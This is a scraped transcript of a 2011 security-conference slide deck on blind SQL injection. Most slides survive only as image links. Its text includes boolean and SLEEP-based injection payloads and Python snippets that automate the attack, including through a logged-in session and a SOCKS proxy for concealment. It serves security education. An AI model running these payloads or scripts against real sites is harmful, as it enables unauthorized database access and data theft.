BlindCanSeeQL: Improved Blind SQL Injection For DB Schema ...
Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection :...
Transcript of Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection :...
![Page 1: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/1.jpg)
BLIND SQL INJECTION(in plain English)
by Duong NgoInformation Security Specialist
TexSAW @ UT Dallas - Oct 2011
![Page 2: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/2.jpg)
Why I need to know Blind SQL injection?
Because you don't want to be like them.(i.e pwned by Blind SQL injection)
![Page 3: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/3.jpg)
Blind vs normal SQLinjection: the difference
Only one: you don't get helpful messages like this
Blind vs Normal SQL injection : The difference
![Page 4: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/4.jpg)
Basic Blind SQL injection
![Page 5: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/5.jpg)
TAKE A LOOK AT THIS VULNERABLE SHOPPING WEBSITE
![Page 6: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/6.jpg)
TEST BY ADDING "AND 1=0"
![Page 7: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/7.jpg)
CONFIRM AGAIN BY ADDING "AND 1=1"
![Page 8: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/8.jpg)
THE QUERY BEHIND THE SCENE p1
![Page 9: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/9.jpg)
THE QUERY BEHIND THE SCENE p2
![Page 10: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/10.jpg)
THE QUERY BEHIND THE SCENE p3
![Page 11: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/11.jpg)
![Page 12: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/12.jpg)
![Page 13: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/13.jpg)
UHM, LET'S LISTEN TO THIS CONVERSATION
![Page 14: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/14.jpg)
![Page 15: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/15.jpg)
![Page 16: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/16.jpg)
![Page 17: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/17.jpg)
![Page 18: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/18.jpg)
![Page 19: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/19.jpg)
![Page 20: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/20.jpg)
![Page 21: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/21.jpg)
![Page 22: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/22.jpg)
![Page 23: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/23.jpg)
![Page 24: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/24.jpg)
![Page 25: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/25.jpg)
![Page 26: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/26.jpg)
![Page 27: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/27.jpg)
![Page 28: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/28.jpg)
![Page 29: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/29.jpg)
![Page 30: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/30.jpg)
![Page 31: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/31.jpg)
A LITTLE BIT MORE ADVANCED
![Page 32: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/32.jpg)
TOTALLY BLIND SQL injectionNO VISIBLE DIFFERENCE!
![Page 33: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/33.jpg)
HOW DO WE ATTACK?
![Page 34: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/34.jpg)
Time-based attack - It's time to go Sleep!
UNION SELECT IF(1=1, SLEEP(10), NULL);
![Page 35: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/35.jpg)
It's sleeping ....
![Page 36: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/36.jpg)
So now it goes back to normal blind SQL injection
![Page 37: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/37.jpg)
Blind SQL injections are time consuming (especially with sleep() z.zz.zzz)
Why not automate it?
![Page 38: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/38.jpg)
Let Python do it for you...Request a URL: import urllib2site = "http://a.com/vuln.php?item_id="payload = "1 AND 1=0"target = site + payloadhtml_result = urllib2.urlopen(target).read()
Read result for normal case:if html_result.find("No item found") == -1: #our clause is Trueelse: #our clause is False
![Page 39: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/39.jpg)
Automated blind SQLi Attack
![Page 40: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/40.jpg)
Confirm result (timeout method)
import socketsocket.setdefaulttimeout(8) #wait 8 seconds
try: #send request to tell the DB to sleep html_result = urllib2.urlopen(target).read()
#our clause is False (DB doesn't sleep)
except socket.timeout: #Our clause is True #(DB is sleeping and can't respond)
![Page 41: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/41.jpg)
Automated Timing Attack - illustration
![Page 42: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/42.jpg)
Attack through authentication
import cookielib, urllib2cookie_jar = cookielib.CookieJar()
#open the url with cookieopener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
site_login = "http://a.com/login.php"params = urllib.urlencode( {"username": "myuser", "pwd": "123"} )
#login firstopener.open(site_login, params)
#execute our attack with our cookie sethtml_result = opener.open(target).read()
![Page 43: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/43.jpg)
Automated member area attack - illustration
![Page 44: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/44.jpg)
Attack with Confidence :) (through proxies)
import socket, socks, urllib2#our proxyserver = "202.12.0.23" port = 8080
#set connection via proxysocks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, server, port)socket.socket = socks.socksocket
#attack safely!html_result = urllib2.urlopen(target)
![Page 45: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/45.jpg)
Automated Attack through proxy
![Page 46: Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection : The difference. Basic Blind SQL injection. TAKE A LOOK AT THIS VULNERABLE SHOPPING](https://reader035.fdocuments.us/reader035/viewer/2022062919/5ee267d1ad6a402d666ce321/html5/thumbnails/46.jpg)
Finally, we get here....:)THANK YOU FOR LISTENING!!
If you are looking for someone to do pen-testing or any security-related works, I'm glad to help you with that.
email me: [email protected]